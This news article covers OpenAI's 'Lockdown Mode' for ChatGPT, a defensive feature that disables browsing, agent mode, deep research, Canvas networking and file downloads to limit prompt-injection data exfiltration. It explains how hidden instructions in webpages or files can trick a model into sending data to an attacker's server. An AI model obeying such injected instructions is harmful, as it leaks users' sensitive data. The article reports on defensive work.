OpenAI Introduces ‘Lockdown Mode’ for ChatGPT OpenAI is rolling out a new “Lockdown Mode” for ChatGPT, aiming to curb data theft from prompt injection attacks while openly acknowledging it cannot fully solve the problem.

Early June rollout and core design

On June 6, OpenAI announced Lockdown Mode as an added layer of defense against prompt injection attacks, where malicious instructions are hidden in webpages or other content a model reads. The company said the feature will “provide additional protection from prompt injection attacks,” in part by disabling live web browsing, deep research, agent mode, and retrieval of images from the web, while still allowing image generation.

Initially, OpenAI began rolling the mode out to self-serve ChatGPT Business accounts and some eligible personal users, targeting organizations that “handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection.”

Expansion to all plans and technical trade‑offs

By June 7, coverage expanded: Lockdown Mode was described as available to logged-in users across Free, Go, Plus, Pro, and self-serve ChatGPT Business tiers. The feature now also disables Canvas networking and file downloads, shutting down the main channels an attacker could use to exfiltrate sensitive information.

OpenAI frames prompt injection as a “frontier” problem affecting all large language models, where hidden instructions in a webpage or uploaded file can trick a model into sending data to an attacker-controlled server. Lockdown Mode “does not stop injections from happening”; malicious payloads in cached pages or PDFs can still influence model behavior, but the mode aims to “substantially reduce the risk of prompt injection-based data exfiltration” by blocking outbound routes.

Who it’s for — and what it breaks

OpenAI stresses that “Lockdown Mode is not intended for everyone,” but for users willing to sacrifice functionality for security. With the mode on, ChatGPT loses much of what makes its agents and research tools powerful: live browsing is limited to cached content, agent mode and deep research are disabled, and some app combinations may still pose residual risk.

The company presents the feature as a pragmatic, partial answer to a structural weakness of current AI systems: they “cannot reliably separate data from instructions,” leaving prompt injection as an ongoing challenge despite tighter controls.

Continue reading https://foxvector.com/stories/019ea45d-3d1b-0f39-7006-00986d1cb513